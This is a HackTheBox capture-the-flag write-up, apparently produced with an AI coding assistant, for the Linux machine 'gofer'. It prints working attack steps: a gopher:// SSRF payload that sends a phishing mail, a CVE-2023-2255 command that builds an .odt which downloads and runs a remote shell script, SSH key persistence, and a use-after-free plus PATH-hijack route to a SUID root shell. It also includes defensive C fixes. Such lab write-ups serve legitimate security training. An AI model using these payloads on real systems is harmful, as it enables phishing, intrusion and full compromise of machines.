HTB: gofer Writeup

Machine Information

| Attribute | Details |
|---|---|
| Name | gofer |
| OS | Linux |
| Difficulty | Hard |
| Points | 50 |
| Release Date | 2023 |
| IP Address | 10.129.129.162 |
| Authors | slartibartfastibest |

Machine Rating

⭐⭐⭐⭐☆ (8.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐⭐☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐⭐☆
  • CTF-like: ⭐⭐⭐⭐☆

Summary

gofer is a Hard-difficulty Linux machine requiring multi-stage exploitation. The attack chain leverages CVE-2023-2255 (LibreOffice command injection), an SSRF vulnerability in a web proxy, Samba enumeration, and a Use-After-Free vulnerability in a custom SUID binary. Initial access is gained by phishing a user with a malicious .odt file sent over SMTP through the SSRF, leading to a reverse shell as jhudson. Privilege escalation exploits a memory safety bug in the notes binary to become root.

TL;DR: Enum Samba → Find SSRF proxy → Use gopher:// to reach SMTP → Phish user with malicious .odt (CVE-2023-2255) → Reverse shell → Exploit Use-After-Free in SUID notes binary → Root.


Reconnaissance

Port Scanning

```bash
nmap -sC -sV -p- 10.129.129.162
```

Results:

```text
22/tcp  open     ssh          OpenSSH 8.4p1 Debian
25/tcp  filtered smtp         (Postfix)
80/tcp  open     http         Apache httpd 2.4.56
139/tcp open     netbios-ssn  Samba smbd 4.6.2
445/tcp open     microsoft-ds Samba smbd 4.6.2
```

Service Enumeration

Hostname: gofer.htb
Subdomain: proxy.gofer.htb

```bash
echo "10.129.129.162 gofer.htb proxy.gofer.htb" >> /etc/hosts
```

Samba Enumeration:

```bash
enum4linux 10.129.129.162
smbclient -L //10.129.129.162 -N
smbclient //10.129.129.162/shares -N
```

Enumerated Users (via RID cycling): jhudson, jdavis, tbuckley, ablake

SMB Shares:

  • shares (anonymous read access) - contains .backup folder with sensitive documents
  • print$ (denied)

Subdomain Discovery:

```bash
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://gofer.htb -H "Host: FUZZ.gofer.htb"
```

Result: proxy.gofer.htb, a web proxy service with an SSRF vulnerability (vulnerable parameter: index.php?url=)

Vulnerability Assessment

Identified Vulnerabilities:

  • SSRF in proxy.gofer.htb — The web proxy accepts arbitrary URLs via index.php?url= parameter. Gopher protocol can be used to bypass firewall restrictions on internal SMTP (port 25).
  • CVE-2023-2255 (LibreOffice command injection) — Malicious .odt files can execute arbitrary commands when opened.
  • Use-After-Free in /usr/local/bin/notes — Custom SUID binary with memory safety vulnerability enabling privilege escalation to root.

Initial Foothold

Exploitation Path

Stage 1: Samba Enumeration & Information Gathering

```bash
smbclient //10.129.129.162/shares -N
cd .backup
ls -la
get email.txt
```

The backup folder contained an email from jdavis to tbuckley revealing:

  • Jocelyn (jhudson) is a phishing target who clicks links without paying attention
  • Documents are sent internally via mail in .odt format
  • Tom (tbuckley) is implementing a web proxy that still needs access restrictions

Stage 2: SSRF-based SMTP Injection

The proxy at proxy.gofer.htb/index.php?url= is vulnerable to SSRF. Port 25 (SMTP) is filtered externally but reachable internally.

Craft a gopher:// URL to reach internal SMTP via SSRF:

```bash
curl "http://proxy.gofer.htb/index.php?url=gopher://localhost:25/_MAIL%20FROM%3Attacker%40attacker.com%0ARCPT%20TO%3Ajhudson%40gofer.htb%0ADATA%0ASubject%3A%20Check%20this%20document%0A%0AClick%20here:%20http://10.10.14.127:8081/test.odt%0A%0A."
```
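On the mitigation side, here is an added example (not code from the writeup or from the machine's index.php) of the allow-list a forwarding proxy should apply to `url=` before fetching: only http and https schemes, and no host that is a loopback, private or link-local literal, which refuses the gopher://localhost:25 request above. The function names are assumed; the check is string-level only and must be paired with resolving the host and re-checking the address actually connected to.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <string.h>
#include <strings.h>

/* Returns 1 when the host part names an interface the proxy must never reach.
 * Purely string-level: a real filter also resolves the name and re-checks the
 * address it connects to (DNS rebinding, redirects, odd IP spellings). */
static int host_is_internal(const char *host, size_t len)
{
    char h[256];
    if (len == 0 || len >= sizeof h) return 1;       /* empty or oversized: refuse */
    memcpy(h, host, len);
    h[len] = '\0';
    if (strcasecmp(h, "localhost") == 0 || h[0] == '[') return 1;  /* incl. [::1] */
    if (strncmp(h, "127.", 4) == 0 || strcmp(h, "0.0.0.0") == 0) return 1;
    if (strncmp(h, "10.", 3) == 0 || strncmp(h, "192.168.", 8) == 0) return 1;
    if (strncmp(h, "169.254.", 8) == 0) return 1;     /* link-local / metadata */
    if (strncmp(h, "172.", 4) == 0) {                 /* 172.16.0.0/12 */
        int second = atoi(h + 4);
        if (second >= 16 && second <= 31) return 1;
    }
    return 0;
}

/* Allow-list for a forwarding proxy such as index.php?url=: only http/https
 * (never gopher://, file://, dict://) and only non-internal hosts. */
int proxy_url_allowed(const char *url)
{
    const char *sep = strstr(url, "://");
    if (sep == NULL) return 0;
    size_t slen = (size_t)(sep - url);
    if (!((slen == 4 && strncasecmp(url, "http", 4) == 0) ||
          (slen == 5 && strncasecmp(url, "https", 5) == 0)))
        return 0;
    const char *auth = sep + 3;
    size_t alen = strcspn(auth, "/?#");               /* [user@]host[:port] */
    const char *host = auth;
    for (size_t i = 0; i < alen; i++)                 /* drop userinfo: http://x@localhost/ */
        if (auth[i] == '@') host = auth + i + 1;
    size_t hlen = (size_t)(auth + alen - host);
    const char *colon = memchr(host, ':', hlen);
    if (colon != NULL && host[0] != '[') hlen = (size_t)(colon - host);
    return host_is_internal(host, hlen) ? 0 : 1;
}
```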

Stage 3: CVE-2023-2255 Exploit - Malicious .odt File

Create a weaponized .odt file that executes shell commands:

```bash
python3 CVE-2023-2255.py --cmd 'wget http://10.10.14.127:8081/shell.sh;chmod +x shell.sh;./shell.sh' --output 'test.odt'
```

Host the .odt file on a simple HTTP server and wait for jhudson to download and open it.

Stage 4: Reverse Shell as jhudson

When jhudson opens test.odt, the CVE-2023-2255 vulnerability triggers the embedded command, executing shell.sh and providing a reverse shell callback.

Stabilize the connection with SSH key:

```bash
ssh-keygen -t rsa -f id_rsa -N ""
echo "$(cat id_rsa.pub)" >> /home/jhudson/.ssh/authorized_keys
ssh -i id_rsa jhudson@10.129.129.162
```

User Compromise

At this stage, we have obtained a reverse shell and SSH access as user jhudson.

Enumeration for Privilege Escalation

```bash
id
sudo -l
find / -perm -4000 -type f 2>/dev/null
```

Key Findings:

  • Apache htpasswd hash found: tbuckley:$apr1$YcZb9OIz$fRzQMx20VskXgmH65jjLh
  • SUID binary discovered: /usr/local/bin/notes - this is the privilege escalation vector

User Flag

```bash
cat ~/user.txt
```

🚩 User Flag: <REDACTED>


Privilege Escalation

Binary Reverse Engineering

The SUID binary /usr/local/bin/notes was analyzed using Cutter/Ghidra:

```bash
cutter /usr/local/bin/notes
# or
ghidra /usr/local/bin/notes
```

Binary Analysis Results:

The notes binary provides the following functionality:

  • Option 1: Create user (allocates 40 bytes: 24 bytes for username + 16 bytes for role)
  • Option 2: List users
  • Option 3: Delete user (frees memory but does NOT null the pointer - Use-After-Free vulnerability!)
  • Option 4: Create note (allocates 40 bytes at the same memory location)
  • Option 8: Check if admin (if role == "admin", prints "Access_granted" and executes the tar command via system() without an absolute path)

Exploitation Strategy: Use-After-Free Memory Corruption

The vulnerability chain:

  1. Create a user (allocates 40 bytes, populates the username field)
  2. Delete the user (frees memory, but the pointer still exists in the structure)
  3. Create a note (re-allocates at the same memory location, allowing us to overwrite the freed memory)
  4. Craft the note with exactly 24 bytes for the username field + "admin" as the role
  5. Option 8 checks if admin and calls system("tar") with a relative path
  6. Since we control PATH, we can execute a fake tar script
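Both root-cause fixes for the notes binary, as an added illustration rather than the machine's own source (which the writeup does not show): delete_user nulls the slot after free so a later 40-byte allocation landing on the same chunk is never read back as a live user, and the admin action runs tar by absolute path with a fixed environment instead of system("tar"). The slot table, the function names and the --version invocation are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

enum { MAX_USERS = 8 };
struct user {                               /* 24 + 16 = 40 bytes, the layout the writeup describes */
    char username[24];
    char role[16];
};
static struct user *users[MAX_USERS];       /* NULL means "no live user in this slot" */
int create_user(int slot, const char *name)
{
    if (slot < 0 || slot >= MAX_USERS || users[slot] != NULL) return -1;
    struct user *u = calloc(1, sizeof *u);  /* zeroed, so the strncpy below stays NUL-terminated */
    if (u == NULL) return -1;
    strncpy(u->username, name, sizeof u->username - 1);
    strcpy(u->role, "user");                /* role is never caller-controlled */
    users[slot] = u;
    return 0;
}

void delete_user(int slot)
{
    if (slot < 0 || slot >= MAX_USERS) return;
    free(users[slot]);
    users[slot] = NULL;                     /* the fix: no dangling pointer survives the free */
}

int is_admin(int slot)
{
    if (slot < 0 || slot >= MAX_USERS || users[slot] == NULL) return 0;
    return strcmp(users[slot]->role, "admin") == 0;
}
/* Archiver run by absolute path with a fixed environment instead of system("tar"),
 * so a caller-controlled PATH cannot substitute /tmp/tar. Returns the child's exit status. */
int run_backup(void)
{
    pid_t pid = fork();
    if (pid == 0) {
        char *const argv[] = { "/usr/bin/tar", "--version", NULL };
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
        execve(argv[0], argv, envp);
        _exit(127);                         /* exec failed, e.g. tar not installed */
    }
    int status = 0;
    if (pid < 0 || waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```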

Exploitation Steps

Step 1: Create malicious tar script in /tmp

```bash
cat > /tmp/tar << 'EOF'
#!/bin/bash
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
EOF
chmod +x /tmp/tar
```

Step 2: Modify PATH to prioritize /tmp

```bash
export PATH=/tmp:$PATH
echo $PATH
```

Step 3: Run the notes binary and exploit UAF

```bash
/usr/local/bin/notes
# At the interactive prompt:
# Press 1: Create user (enter any username)
# Press 3: Delete user (triggers free without nulling pointer)
# Press 4: Create note (enter 24 A's followed by "admin": "AAAAAAAAAAAAAAAAAAAAAAAAadmin")
# Press 8: Check admin status (triggers Access_granted + system("tar"))
```

Our malicious /tmp/tar executes, creating a SUID bash shell.

Step 4: Escalate to root

```bash
/tmp/bash -p
id
```

Root Flag

```bash
cat /root/root.txt
```

🚩 Root Flag: <REDACTED>


Attack Chain Summary

```mermaid
graph TD
A["Reconnaissance:<br/>nmap, enum4linux, wfuzz"] -->|Found Samba shares| B["Anonymous Samba Access<br/>Download .backup folder"]
B -->|Discover SMTP phishing<br/>opportunity| C["Subdomain Discovery<br/>proxy.gofer.htb identified"]
C -->|SSRF proxy found| D["Gopher:// SSRF Injection<br/>Bypass firewall to SMTP"]
D -->|Reach internal SMTP| E["CVE-2023-2255 Exploit<br/>Create malicious .odt"]
E -->|Send phishing email| F["jhudson opens .odt<br/>Reverse shell callback"]
F -->|User shell obtained| G["Find SUID binary<br/>/usr/local/bin/notes"]
G -->|Binary analysis| H["Use-After-Free UAF<br/>Memory corruption"]
H -->|Exploit UAF| I["Create fake tar in PATH<br/>Execute as root"]
I -->|ROOT ACCESS| J["Root shell obtained<br/>Mission complete"]
```

Tools Used

| Tool | Purpose |
|---|---|
| nmap | Port scanning and service fingerprinting |
| enum4linux | Samba user and share enumeration via RID cycling |
| smbclient | SMB share access and file download |
| wfuzz | Virtual host/subdomain discovery |
| curl | HTTP requests and SSRF SMTP injection |
| gopher | Protocol for SSRF bypass to reach filtered SMTP |
| wget | File download during payload execution |
| python3 | CVE-2023-2255 exploit execution |
| cutter / ghidra | Reverse engineering of SUID binary |
| ssh | Secure shell access for stable connection |
| nc / bash | Reverse shell listener and command execution |
| hashcat | Optional: password hash cracking |
| ssh-keygen | SSH key generation for persistence |

Vulnerability Reference

| # | CVE ID | Vulnerability | Component | Severity | Impact |
|---|---|---|---|---|---|
| 1 | CVE-2023-2255 | LibreOffice Command Injection | LibreOffice / .odt files | Critical | Arbitrary command execution via malicious documents |
| 2 | N/A | Server-Side Request Forgery (SSRF) | proxy.gofer.htb (index.php) | High | Bypass firewall restrictions, access internal services |
| 3 | N/A | Use-After-Free (UAF) | /usr/local/bin/notes (custom SUID binary) | Critical | Memory corruption leading to privilege escalation |
| 4 | N/A | Relative Path Execution | /usr/local/bin/notes (tar command) | High | Combined with UAF for root code execution |

Key Learnings

  • Thorough Enumeration is Critical: Every open port and service (Samba, web proxies) can reveal sensitive information or unintended functionality. Enum4linux RID cycling revealed valid usernames for targeting.

  • Document Formats Are Attack Vectors: Modern office document formats (.odt, .docx) are compound archives that can embed executable code. CVE-2023-2255 demonstrates how LibreOffice's macro/scripting capabilities can be weaponized.

  • SSRF with Alternative Protocols: Standard firewall rules block direct outbound connections to internal services, but SSRF via proxy + gopher:// protocol can bypass these restrictions. Always consider alternative protocols when standard approaches fail.

  • Phishing Combined with Code Injection: Social engineering (finding a target known to click links) combined with exploitable file formats is a powerful attack chain for initial compromise.

  • Memory Safety in SUID Binaries: Custom SUID binaries are high-value targets. Use-After-Free vulnerabilities can be exploited to corrupt memory and achieve privilege escalation. Reverse engineering tools (Cutter, Ghidra) are essential for analyzing binary security.

  • Relative Path Execution in Privileged Context: Commands executed via system() in SUID binaries with relative paths (e.g., system("tar") instead of system("/bin/tar")) allow PATH hijacking for privilege escalation.

  • Defense-in-Depth Failures: This machine demonstrates how chained vulnerabilities (SSRF → phishing → RCE → UAF → root) can completely compromise a system despite individual protections.


Author

Writeup Creator: Claude Code

Original Machine Author: slartibartfastibest (HackTheBox)


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Hard #CVE-2023-2255 #SSRF #UseAfterFree #LibreOffice #ReverseEngineering